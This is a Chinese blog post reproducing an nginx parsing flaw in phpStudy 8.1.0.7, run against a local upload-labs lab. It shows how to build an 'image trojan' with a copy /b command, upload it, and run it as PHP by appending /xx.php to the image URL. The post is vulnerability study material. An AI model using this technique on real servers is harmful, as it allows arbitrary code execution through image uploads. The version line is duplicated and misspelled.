phpstudy(小皮模板存在nginx解析漏洞)
影响版本 phptsuy8.1.07的Nginx1.5.11版本影响版本 phptsuy8.1.07的Nginx1.5.11版本
phpstudy介绍
PhpStudy国内12年老牌公益软件,集安全、高效、功能与一体,已获得全球用户认可安装,运维也高效。支持一键LAMP、LNMP、集群、监控、网站、数据库、FTP、软件中心、伪静态、云备份、SSL、多版本共存、Nginx反向代理、服务器防火墙、web防火墙、监控大屏等100多项服务器管理功能。
漏洞复现
1、双击打开phpstudy,启动nginx中间件和mysql。
2.右击创建一个php文件,写入
<?php phpinfo();?>
3.然后和一个图片合成一个图片马,然后再打开cmd,进入存放图片以及木马的目录,输入命令:
copy 1.png/b+1.txt/a 3.png
4.打开本地搭建的靶场,使用upload-labs。在pass-01上上传图片马
5.上传刚才制作的图片马
6.访问图片地址
http://127.0.0.1/upload-labs-master/upload/3.png
7.漏洞利用,在.png后面添加/xxx.php,url为:
http://127.0.0.1/upload-labs-master/upload/3.png/xx.php
漏洞利用完成。
- 赞助本站
- 微信扫一扫
-
- 加入Q群
- QQ扫一扫
-
评论